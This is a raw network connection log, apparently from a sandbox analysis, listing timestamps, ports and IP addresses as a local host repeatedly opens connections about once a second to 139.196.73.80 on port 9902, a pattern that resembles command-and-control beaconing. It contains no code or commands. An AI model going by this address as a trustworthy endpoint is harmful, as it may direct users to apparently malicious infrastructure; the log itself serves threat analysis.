Apr 17, 2024 07:07:40.423712969 CEST	49760	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:40.653979063 CEST	9902	49759	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:40.738029003 CEST	9902	49760	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:40.738539934 CEST	49760	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:40.738590002 CEST	49760	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.050806999 CEST	9902	49760	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.059743881 CEST	9902	49760	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.059776068 CEST	9902	49760	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.059834003 CEST	49760	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.059856892 CEST	49760	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.059962034 CEST	49760	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.173424006 CEST	49761	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.374140978 CEST	9902	49760	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.505924940 CEST	9902	49761	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.506119013 CEST	49761	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.506294966 CEST	49761	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.827004910 CEST	9902	49761	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.829854012 CEST	9902	49761	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.829866886 CEST	9902	49761	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:41.829916954 CEST	49761	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.829953909 CEST	49761	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.830291986 CEST	49761	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:41.939925909 CEST	49762	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:42.163463116 CEST	9902	49761	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:42.288598061 CEST	9902	49762	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:42.288711071 CEST	49762	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:42.288953066 CEST	49762	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:42.642863035 CEST	9902	49762	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:42.647068024 CEST	9902	49762	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:42.647078991 CEST	9902	49762	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:42.647473097 CEST	49762	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:42.647562981 CEST	49762	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:42.752253056 CEST	49763	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:42.993360043 CEST	9902	49762	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.065113068 CEST	9902	49763	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.065227032 CEST	49763	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.065495014 CEST	49763	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.376072884 CEST	9902	49763	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.378684044 CEST	9902	49763	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.378703117 CEST	9902	49763	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.378743887 CEST	49763	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.378787041 CEST	49763	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.378962040 CEST	49763	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.486191034 CEST	49764	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.691262960 CEST	9902	49763	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.821460962 CEST	9902	49764	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:43.821815014 CEST	49764	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:43.825597048 CEST	49764	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.159812927 CEST	9902	49764	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.163419962 CEST	9902	49764	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.163439989 CEST	9902	49764	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.163527966 CEST	49764	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.163716078 CEST	49764	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.163716078 CEST	49764	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.267468929 CEST	49765	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.503654957 CEST	9902	49764	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.609939098 CEST	9902	49765	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.610586882 CEST	49765	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.610974073 CEST	49765	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.942884922 CEST	9902	49765	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.945724964 CEST	9902	49765	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.945743084 CEST	9902	49765	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:44.945928097 CEST	49765	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.945928097 CEST	49765	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:44.946302891 CEST	49765	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:45.048790932 CEST	49766	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:45.279792070 CEST	9902	49765	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:45.362127066 CEST	9902	49766	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:45.362245083 CEST	49766	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:45.362401962 CEST	49766	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:45.675487995 CEST	9902	49766	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:45.678443909 CEST	9902	49766	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:45.678459883 CEST	9902	49766	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:45.678658962 CEST	49766	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:45.688152075 CEST	49766	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:45.798492908 CEST	49767	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.001291990 CEST	9902	49766	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.146334887 CEST	9902	49767	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.146897078 CEST	49767	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.147056103 CEST	49767	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.486902952 CEST	9902	49767	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.489902973 CEST	9902	49767	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.489924908 CEST	9902	49767	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.490093946 CEST	49767	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.490094900 CEST	49767	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.490247965 CEST	49767	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.640646935 CEST	49768	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:46.836622000 CEST	9902	49767	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.953872919 CEST	9902	49768	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:46.954010010 CEST	49768	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:47.145778894 CEST	49768	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:47.458344936 CEST	9902	49768	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:47.461210012 CEST	9902	49768	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:47.461282015 CEST	49768	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:47.461443901 CEST	9902	49768	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:47.461504936 CEST	49768	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:48.199562073 CEST	49768	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:48.336498022 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:48.512320042 CEST	9902	49768	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:49.344794035 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:49.698613882 CEST	9902	49769	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:49.698713064 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:49.699009895 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.094757080 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.443430901 CEST	9902	49769	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:50.446268082 CEST	9902	49769	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:50.446286917 CEST	9902	49769	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:50.446372032 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.446372032 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.446511030 CEST	49769	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.548295975 CEST	49770	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.791486979 CEST	9902	49769	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:50.887845039 CEST	9902	49770	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:50.888055086 CEST	49770	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:50.888155937 CEST	49770	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:51.225099087 CEST	9902	49770	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:51.227761984 CEST	9902	49770	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:51.227801085 CEST	9902	49770	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:51.227891922 CEST	49770	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:51.227957010 CEST	49770	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:51.228287935 CEST	49770	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:51.329487085 CEST	49771	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:51.569097042 CEST	9902	49770	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:51.672986031 CEST	9902	49771	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:51.673301935 CEST	49771	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:51.673891068 CEST	49771	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.028006077 CEST	9902	49771	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.031653881 CEST	9902	49771	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.031672955 CEST	9902	49771	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.031712055 CEST	49771	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.031735897 CEST	49771	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.031933069 CEST	49771	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.144901991 CEST	49772	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.362484932 CEST	9902	49771	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.498116016 CEST	9902	49772	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.498224020 CEST	49772	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.535451889 CEST	49772	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.874731064 CEST	9902	49772	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.877414942 CEST	9902	49772	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.877437115 CEST	9902	49772	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:52.877768040 CEST	49772	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.877768040 CEST	49772	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.877768040 CEST	49772	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:52.986216068 CEST	49774	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:53.230911016 CEST	9902	49772	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:53.339828968 CEST	9902	49774	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:53.340245962 CEST	49774	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:53.340483904 CEST	49774	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:53.686392069 CEST	9902	49774	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:53.688910007 CEST	9902	49774	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:53.688924074 CEST	9902	49774	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:53.689202070 CEST	49774	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:53.689202070 CEST	49774	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:53.798547029 CEST	49775	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.057723045 CEST	9902	49774	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.125808001 CEST	9902	49775	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.126022100 CEST	49775	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.126465082 CEST	49775	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.456912041 CEST	9902	49775	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.459425926 CEST	9902	49775	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.459443092 CEST	9902	49775	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.459584951 CEST	49775	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.459585905 CEST	49775	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.459681034 CEST	49775	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.573873043 CEST	49776	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.792237997 CEST	9902	49775	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.908577919 CEST	9902	49776	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:54.916384935 CEST	49776	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:54.916657925 CEST	49776	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:55.244003057 CEST	9902	49776	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:55.246622086 CEST	9902	49776	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:55.246654987 CEST	9902	49776	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:55.246823072 CEST	49776	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:55.246823072 CEST	49776	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:55.246920109 CEST	49776	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:55.361304045 CEST	49777	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:55.580784082 CEST	9902	49776	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:55.708632946 CEST	9902	49777	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:55.709111929 CEST	49777	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:55.709172010 CEST	49777	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.056947947 CEST	9902	49777	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.059880972 CEST	9902	49777	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.059912920 CEST	9902	49777	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.060347080 CEST	49777	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.060587883 CEST	49777	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.174309969 CEST	49778	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.411632061 CEST	9902	49777	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.489351034 CEST	9902	49778	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.489708900 CEST	49778	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.489833117 CEST	49778	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.806163073 CEST	9902	49778	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.809098005 CEST	9902	49778	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.809117079 CEST	9902	49778	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:56.809298992 CEST	49778	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.809298992 CEST	49778	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.809395075 CEST	49778	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:56.940190077 CEST	49779	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:57.125051975 CEST	9902	49778	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:57.288237095 CEST	9902	49779	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:57.288511992 CEST	49779	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:57.311469078 CEST	49779	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:57.667139053 CEST	9902	49779	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:57.669955969 CEST	9902	49779	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:57.669975042 CEST	9902	49779	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:57.670183897 CEST	49779	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:57.670183897 CEST	49779	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:57.670587063 CEST	49779	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:57.783447027 CEST	49780	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.025036097 CEST	9902	49779	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.094461918 CEST	9902	49780	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.094577074 CEST	49780	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.094777107 CEST	49780	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.418050051 CEST	9902	49780	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.420608044 CEST	9902	49780	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.420624971 CEST	9902	49780	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.420682907 CEST	49780	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.420737028 CEST	49780	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.420831919 CEST	49780	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.533473015 CEST	49781	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.739774942 CEST	9902	49780	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.861680031 CEST	9902	49781	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:58.861807108 CEST	49781	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:58.862082958 CEST	49781	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.191318989 CEST	9902	49781	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.193543911 CEST	9902	49781	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.193562984 CEST	9902	49781	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.193615913 CEST	49781	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.193643093 CEST	49781	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.193742037 CEST	49781	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.299019098 CEST	49782	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.523458004 CEST	9902	49781	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.622400999 CEST	9902	49782	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.622627020 CEST	49782	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.622862101 CEST	49782	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.957290888 CEST	9902	49782	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.960019112 CEST	9902	49782	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.960038900 CEST	9902	49782	139.196.73.80	192.168.2.4
Apr 17, 2024 07:07:59.960131884 CEST	49782	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.960133076 CEST	49782	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:07:59.960314035 CEST	49782	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:00.067714930 CEST	49783	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:00.282594919 CEST	9902	49782	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:00.383451939 CEST	9902	49783	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:00.383609056 CEST	49783	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:00.396369934 CEST	49783	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:00.711776972 CEST	9902	49783	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:00.714998960 CEST	9902	49783	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:00.715032101 CEST	9902	49783	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:00.715231895 CEST	49783	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:00.715569019 CEST	49783	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:00.831198931 CEST	49784	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.031728983 CEST	9902	49783	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.156495094 CEST	9902	49784	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.156877995 CEST	49784	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.157025099 CEST	49784	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.481841087 CEST	9902	49784	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.485349894 CEST	9902	49784	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.485368967 CEST	9902	49784	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.485696077 CEST	49784	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.485696077 CEST	49784	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.596182108 CEST	49785	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.810749054 CEST	9902	49784	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.935725927 CEST	9902	49785	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:01.936203957 CEST	49785	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:01.936640024 CEST	49785	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:02.280364037 CEST	9902	49785	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:02.283452988 CEST	9902	49785	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:02.283473969 CEST	9902	49785	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:02.283664942 CEST	49785	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:02.283665895 CEST	49785	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:02.283665895 CEST	49785	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:02.393913031 CEST	49786	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:02.626773119 CEST	9902	49785	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:02.719026089 CEST	9902	49786	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:02.719491005 CEST	49786	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:02.719592094 CEST	49786	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.044591904 CEST	9902	49786	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.047669888 CEST	9902	49786	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.047700882 CEST	9902	49786	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.048135042 CEST	49786	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.048645973 CEST	49786	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.158962011 CEST	49787	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.373672009 CEST	9902	49786	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.469736099 CEST	9902	49787	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.469981909 CEST	49787	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.495831013 CEST	49787	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.818540096 CEST	9902	49787	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.821366072 CEST	9902	49787	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.821405888 CEST	9902	49787	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:03.821469069 CEST	49787	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.821538925 CEST	49787	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.824156046 CEST	49787	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:03.940490961 CEST	49788	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.134293079 CEST	9902	49787	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:04.255274057 CEST	9902	49788	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:04.255395889 CEST	49788	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.255625963 CEST	49788	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.571784019 CEST	9902	49788	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:04.574947119 CEST	9902	49788	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:04.574987888 CEST	9902	49788	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:04.575037003 CEST	49788	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.575185061 CEST	49788	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.578183889 CEST	49788	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.692246914 CEST	49789	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:04.892963886 CEST	9902	49788	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:05.020776987 CEST	9902	49789	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:05.020876884 CEST	49789	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:05.099453926 CEST	49789	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:05.428221941 CEST	9902	49789	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:05.431288004 CEST	9902	49789	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:05.431350946 CEST	9902	49789	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:05.431585073 CEST	49789	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:05.431898117 CEST	49789	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:05.761002064 CEST	9902	49789	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:06.363311052 CEST	49790	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:06.680319071 CEST	9902	49790	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:06.680427074 CEST	49790	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:06.680625916 CEST	49790	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:06.997746944 CEST	9902	49790	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.001836061 CEST	9902	49790	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.001926899 CEST	9902	49790	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:07.001960993 CEST	49790	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.001993895 CEST	49790	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.042896032 CEST	49790	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.179670095 CEST	49791	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:07.359920025 CEST	9902	49790	139.196.73.80	192.168.2.4
